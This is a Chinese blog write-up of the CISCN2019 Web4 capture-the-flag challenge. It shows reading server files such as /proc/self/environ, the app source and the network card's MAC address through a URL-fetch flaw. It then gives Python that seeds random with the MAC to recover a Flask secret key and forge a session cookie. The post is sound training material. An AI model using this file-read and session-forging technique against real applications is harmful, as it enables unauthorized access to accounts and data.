刷题笔记:[CISCN2019 华东南赛区]Web4

CTF Web Flask
Web
发布日期:   2021-08-21
更新日期:   2022-01-28
文章字数:   195
阅读时长:   1 分

前言

关键字:[flask|uuid.getnode|网卡|MAC|session]

题解

感觉像是SSRF

file提示直接hack

dict和gopher没提示

可以读取文件

读取/proc/self/environ

读/app/app.py

看来需要构造session

构造session需要拿到key,而key是由随机生成的,那接下来的问题就是如何拿到随机种子。

uuid.getnode()获取的是网卡MAC地址的十进制数,需要读取/sys/class/net/eth0/address

02:42:ac:10:b8:1e

转换成十进制数,6*8=48bit

import random

mac = "02:42:ac:10:b9:08"
temp = mac.split(':')
temp = [int(i, 16) for i in temp]
temp = [bin(i).replace('0b', '').zfill(8) for i in temp]
temp = ''.join(temp)
mac = int(temp, 2)
random.seed(mac)
randStr = str(random.random() * 233)
print(randStr)

生成key为147.922415852

用flask-session-cookie-manager构造下session,结束。

文章作者: 巡璃
文章链接: https://syunaht.com/p/358833585.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 巡璃 !
CTF Web Flask
评论
  目录